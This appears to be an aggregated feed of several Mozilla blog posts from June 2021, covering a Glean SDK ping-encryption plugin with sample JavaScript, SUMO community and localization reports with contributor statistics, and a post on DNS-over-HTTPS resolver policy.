As discussed, ping encryption is not a feature required by all products using Glean. From a client standpoint, it is also a feature that has the potential to significantly increase the size of the final Glean SDK because, in most environments, external dependencies are necessary to encrypt the ping payload. Ideally, we should find a way to make it an opt-in feature, i.e. only users that actually need it pay the (size) price for it. And so we did.

Ping encryption was the perfect use case to implement a new and long discussed feature in the Glean SDKs: plugins. By implementing the ping encryption as a plugin and not a core feature, we achieve the goal of making it an opt-in feature. This strategy also has the added bonus of keeping the encryption initialization parameters out of the Glean configuration object, win/win.

Since the ping encryption plugin would be the first ever Glean SDK plugin, we needed to figure out our plugin architecture. In a nutshell, the concept we settled for is: plugins are classes that define an action to be performed when a specific Glean event happens. Each event might provide extra context for the action performed by the plugin and might require that the plugin return a modified version of said context. Plugin instances are passed to Glean as initialization parameters.

Let’s put a shape to this by describing the ping encryption plugin; a code sketch follows the list.

  • The ping encryption plugin is registered to the afterPingCollection event.
    •  This event will call a plugin action after the ping is collected, but before it is stored and queued for upload. This event will also provide the collected ping payload as context to the plugin action and requires that the action return a JSON object. Whatever the action returns is what will be saved and queued for upload in place of the original payload. If no plugin is registered to this event, collection happens as usual.
  • The ping encryption plugin action gets the ping payload from this event and returns an encrypted version of that payload.
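
To make that concrete, here is a minimal sketch of what such a plugin class could look like. The names below (event, action, encryptPayload) are illustrative only, not the actual Glean SDK API:

// Illustrative sketch, not the real Glean SDK API.
class PingEncryptionPlugin {
  constructor(publicJwk) {
    // The event this plugin hooks into: after collection, before storage.
    this.event = "afterPingCollection";
    this.publicJwk = publicJwk;
  }

  // Receives the collected ping payload as context and must return the
  // JSON object to store and queue for upload in its place.
  async action(payload) {
    // `encryptPayload` stands in for a real JWE encryption routine.
    return { payload: await encryptPayload(this.publicJwk, JSON.stringify(payload)) };
  }
}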

In order to use this plugin, products using Glean need to pass an instance of it to the Glean SDK of their choice during initialization.

import Glean from "@mozilla/glean/webext"
import PingEncryptionPlugin from "@mozilla/glean/plugins/encryption"
Glean.initialize(
  "my.fancy.encrypted.app",
  uploadStatus,
  {
    plugins: [
      new PingEncryptionPlugin({
        "crv": "P-256",
        "kid": "fancy",
        "kty": "EC",
        "x": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
        "y": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
      })
    ]
  }
);

And that is it. All pings sent from this Glean instance will now be encrypted before they are sent.

Note: The ping encryption plugin is only available on the Glean JavaScript SDK at the moment. Please refer to the Glean book for comprehensive documentation on using the PingEncryptionPlugin.

Limitations and next steps

While the current approach serves the needs of Mozilla’s internal customers, there are some limitations that we are planning to smooth out in the future. For example, in order to be properly routed, products that want to opt-into Glean pipeline encryption will need to use a fixed, common prefix in their application id. Another constraint of the current system is that once a product opts into Pipeline encryption, all the pings are expected to be encrypted: the same product won’t be able to send both pipeline-encrypted and pipeline-unencrypted pings.

One final constraint is that the tooling available in the secure environment is limited to Jupyter notebooks.

Acknowledgements

The pipeline encryption support in Glean wasn’t built in a day! This major feature is based on the incremental work of many Mozillians over the past year (thank you Wesley Dawson, Anthony Miyaguchi, Arkadiusz Komarzewski, and anyone else who helped with it!).

And kudos to the first product making use of this neat feature!

Support.Mozilla.OrgWhat’s up with SUMO – June 2021

Hey SUMO folks,

Welcome to the month of June 2021. The release of Firefox 89 marks a new milestone for the browser, with lots of excitement and anticipation for the changes.

Let’s see what we’re up to these days!

Welcome on board!

  1. Welcome and thanks to TerryN21 and Mamoon for being active in the forum.

Community news

  • June is the month of Major Release 1 (MR1) or commonly known as Proton release. We have prepared a spreadsheet to list down the changes for this release, so you can easily find the workarounds, related bugs, and common responses for each issue. You can join Firefox 89 discussion in this thread and find out about our tagging plan here.
  • If an advanced topic like pref modification in about:config is something that you’re interested in, please join our discussion in this community thread. We talked about how we can accommodate this in a more responsible and safer way without harming our normal users.
  • What do you think of supporting Firefox users on Facebook? Join our discussion here.
  • We said goodbye to Joni last month and Madalina has also bid farewell to us in our last community call (though she’ll stay until the end of the quarter). It’s sad to let people go, but we know that changes are normal and expected. We’re grateful for what both Joni and Madalina have done in SUMO and hope the best for whatever comes next for them.
  • Another reminder to check out Firefox Daily Digest to get daily updates about Firefox. Go check it out and subscribe if you haven’t already.
  • There’s only one update from our dev team in the past month:

Community call

  • Find out what we talked about in our community call in May.
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB Page views

Month | Page views | vs. previous month
May 2021 | 7,601,709 | -13.02%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Jeff
  3. Michele Rodaro
  4. Underpass
  5. Marcelo Ghelman

KB Localization

Top 10 locales based on total page views

Locale | Apr 2021 page views | Localization progress (as of Jun 3)
de | 10.05% | 99%
zh-CN | 6.82% | 100%
es | 6.71% | 42%
pt-BR | 6.61% | 65%
fr | 6.37% | 86%
ja | 4.33% | 53%
ru | 3.54% | 95%
it | 2.28% | 98%
pl | 2.17% | 84%
zh-TW | 1.04% | 6%

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Artist
  3. Markh2
  4. Soucet
  5. Goudron

Forum Support

Forum stats

Month | Total questions | Answer rate within 72 hrs | Solved rate within 72 hrs | Forum helpfulness
Jun 2021 | 3091 | 65.97% | 13.62% | 63.64%

Top 5 forum contributors in the last 90 days: 

  1. Cor-el
  2. FredMcD
  3. Jscher2000
  4. Seburo
  5. Databaseben

Social Support

Channel | Total conv (May 2021) | Conv handled
@firefox | 4012 | 212
@FirefoxSupport | 367 | 267

Top 5 contributors in Q1 2021

  1. Christophe Villeneuve
  2. Md Monirul Alom
  3. Devin E
  4. Andrew Truong
  5. Dayana Galeano

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

  • Fx 89 / MR1 released (June 1)
    • BIG THANKS – to all the contributors who helped with article revisions, localization, and for the help with ongoing MR1 Rapid Feedback Collection reporting
  • Fx 90 (July 13)
    • Background update Agents
    • SmartBlock UI improvements
    • about:third-party addition

Firefox mobile

  • Fx for Android 89 (June 1)
    • Improved menus
    • Redesigned Top Sites
    • Easier access to Synced Tabs
  • Fx for iOS V34 (June 1)
    • Updated Look
    • Search enhancements
    • Tab improvements
  • Fx for Android 90 (July 13th)
    • CC autocomplete

Other products / Experiments

  • Sunset of Firefox Lite (June 1)
    • Effective June 30, this app will no longer receive security or other updates. Get the official Firefox Android app now for a fast, private & safe web browser
  • Mozilla VPN V2.3 (June 8)
    • Captive Portal Alerts
  • Mozilla VPN V2.4 (July 14)
    • Split tunneling for Windows
    • Local DNS: user settings for local dns server

Shout-outs!

  • Thanks to Danny Colin and Monirul Alom for helping with the MR1 feedback collection project! 🙌

If you know anyone that we should feature here, please contact Kiki, and we’ll make sure to add them in our next edition.

Useful links:

Mozilla Localization (L10N)L10n Report: June 2021 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New content and projects

Firefox 89 (MR1)

On June 1st, Mozilla released Firefox 89. That was a major milestone for Firefox, and a lot of work went into this release (internally called MR1, which stands for Major Release 1). This new update was well received — see for example this recent article from ZDNet — and that’s also thanks to the amazing work done by our localization community.

For the first time in over a decade, we looked at Firefox holistically, making changes across the board to improve messages, establish a more consistent tone, and modernize some dialogs. This inevitably generated a lot of new content to localize.

Between November 2020 and May 2021, we added 1637 strings (6798 words). As a point of reference, that’s almost 14% of the entire browser. What’s amazing is that the completion levels didn’t fall drastically:

  • Nov 30, 2020: 89.03% translated across all shipping locales, 99.24% for the top 15 locales.
  • May 24, 2021: 87.85% translated across all shipping locales, 99.39% for the top 15 locales.

The completion level across all locales is lower, but that’s mostly due to locales that are completely unmaintained, and that we’ll likely need to drop from release later this year. If we exclude those 7 locales, overall completion increased by 0.10% (to 89.84%).

Once again, thanks to all the volunteers who contributed to this successful release of Firefox.

What’s new or coming up in Firefox desktop

These are the important deadlines for Firefox 90, currently in Beta:

  • Firefox 90 will be released on July 13. It will be possible to update localizations until July 4.
  • Firefox 91 will move to beta on July 12 and will be released on August 10.

Keep in mind that Firefox 91 is also going to be the next ESR version. Once that moves to release, it won’t generally be possible to update translations for that specific version.

Talking about Firefox 91, we’re planning to add a new locale: Scots. Congratulations to the team for making it to release so quickly!

On a final note, expect to see more updates to the Firefox L10n Newsletter, since this has proved to be an important tool to provide more context to localizers, and help them with testing.

What’s new or coming up in mobile

Next l10n deadlines for mobile projects:

  • Firefox for Android v91: July 12
  • Firefox for iOS v34.1: June 9

Once more, we want to thank all the localizers who worked hard for the MR1 (Proton) mobile release. We really appreciate the time and effort spent on helping ensure all these products are available globally (and of course, also on desktop). THANK YOU!

What’s new or coming up in web projects

AMO

There are a few strings exposed in Pontoon that do not require translation; only Mozilla staff with the admin role for the product can see them. The developer of the feature will add a “no need to translate” comment or more context to these strings at a later time. We don’t know when this will happen, so for the time being, please ignore them. Most of the strings with a source string ID of src/olympia/scanners/templates/admin/* can be ignored; however, a handful of strings still fall outside that category.

MDN

The project continues to be on hold in Pontoon. The product repository doesn’t pick up any changes made in Pontoon, so fr, ja, zh-CN, and zh-TW are read-only for now. The MDN site, however, still maintains the articles localized in these languages, plus ko, pt-BR, and ru.

Mozilla.org

Since our last report, the websites in the ar, hi-IN, id, ja, and ms languages have been fully localized through a vendor service. Communities for these languages are encouraged to help promote the sites through various social media platforms to increase downloads, conversions, and new profile creation.

What’s new or coming up in SuMo

Lots of exciting things happening in SUMO in Q2. Here’s a recap of what’s happening:

  • You can now subscribe to Firefox Daily Digest to get updates about what people are saying about Firefox and other Mozilla products on social media like Reddit and Twitter.
  • We now have release notes for Kitsune in Discourse. The latest one was about advanced search syntax which is a replacement for the former Advanced Search feature.
  • We are trying something new for Firefox 89 by collecting MR1 (Major Release 1) specific feedback from across channels (support forum, Twitter, and Reddit). You can look into how we’re doing it on the contributor thread and learn more about MR1 changes from a list that we put together on this spreadsheet.

As always, feel free to join SUMO Matrix room to discuss or just say hi to the rest of the community.

What’s new or coming up in Pontoon

Since May, we’ve been running experiments in Pontoon to increase the number of users reading notifications. For example, as part of this campaign, you might have seen a banner encouraging you to install the Pontoon Add-on — which you really should do — or noticed a slightly different notification icon in the top right corner of the window.

Recently, we also sent an email to all Pontoon accounts active in the past 2 years, with a link to a survey specifically about further improving notifications. If you haven’t completed the survey yet, or haven’t received the email, you can still take the survey here (until June 20th).

Look out for pilcrows

When a source string includes line breaks, Pontoon will show a pilcrow character (¶) where the line break happens.

This is how the Fluent file looks:

onboarding-multistage-theme-tooltip-automatic-2 =
    .title =
        Inherit the appearance of your operating
        system for buttons, menus, and windows.

While in most cases the line break is not relevant — it’s just used to make the source file more readable — double-check the resource comment: if the line break is relevant, it will be pointed out explicitly.

If it’s not relevant, you can just put your translation on one line.

If you want to preserve the line breaks in your translation, you have a few options:

  • Use SHIFT+ENTER to create a new line while translating.
  • Click the ¶ character in the source: that will create a new line in the position where your cursor currently sits.
  • Use the COPY button to copy the source, then edit it. That’s not really efficient, as your locale might need a line break in a different place.

Do not select the text with your mouse and paste it into the translation field: that would copy the literal ¶ character into the translation, and it would be displayed in the final product, causing bugs.

If you see the ¶ character in the translation field, it will also appear in the product you are translating, which is most likely not what you want. On the other hand, it’s expected to see the ¶ character in the list of translations under the translation field, as it is part of the source string.

Events

  • We have held our first Localization Workshop Zoom event on Saturday June 5th. Next iterations will happen on Friday June 11th and Saturday June 12th. We have invited active managers and translators from a subset of locales. If this experience turns out to be useful, we will consider opening up to an even larger audience with expanded locales.
  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

  • If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Mozilla Privacy BlogWorking in the open: Enhancing privacy and security in the DNS

In 2018, we started pioneering work on securing one of the oldest parts of the Internet, one that had till then remained largely untouched by efforts to make the web safer and more private: the Domain Name System (DNS). We passed a key milestone in that endeavor last year, when we rolled out DNS-over-HTTPS (DoH) technology by default in the United States, thus improving privacy and security for millions of people. Given the transformative nature of this technology and in line with our mission commitment to transparency and collaboration, we have consistently sought to implement DoH thoughtfully and inclusively. Today we’re sharing our latest update on that continued effort.

Between November 2020 and January 2021 we ran a public comment period to give the broader community who care about the DNS – including human rights defenders, technologists, and DNS service providers – the opportunity to provide recommendations for our future DoH work. Specifically, we canvassed input on our Trusted Recursive Resolver (TRR) policies: the set of privacy, security, and integrity commitments that DNS recursive resolvers must adhere to in order to be considered as default partner resolvers for Mozilla’s DoH roll-out.

We received rich feedback from stakeholders across the world, and we continue to reflect on how it can inform our future DoH work and our TRR policies. As we continue that reflection, we’re today publishing the input we received during the comment period – acting on a commitment to transparency that we made at the outset of the process. You can read the comments here.

During the comment period and prior, we received substantial input on the blocklist publication requirement of our TRR policies. This requirement means that resolvers in our TRR programme must publicly release the list of domains that they block access to. This blocking could be the result either of legal requirements that the resolver is subject to, or of a user having explicitly consented to certain forms of DNS blocking. We are aware of the downsides associated with blocklist publication in certain contexts, and one of the primary reasons for undertaking our comment period was to solicit constructive feedback and suggestions on how best to ensure meaningful transparency when DNS blocking takes place. Therefore, while we reflect on the input regarding our TRR policies and solutions for blocking transparency, we will relax this blocklist publication requirement. As such, current or prospective TRR partners will no longer be required to publish DNS blocklists.

DoH is a transformative technology. It is relatively new and, as such, is of interest to a variety of stakeholders around the world. As we bring the privacy and security benefits of DoH to more Firefox users, we will continue our proactive engagement with internet service providers, civil society organisations, and everyone who cares about privacy and security in the internet ecosystem.

We look forward to this collaborative work. Stay tuned for more updates in the coming months.

The post Working in the open: Enhancing privacy and security in the DNS appeared first on Open Policy & Advocacy.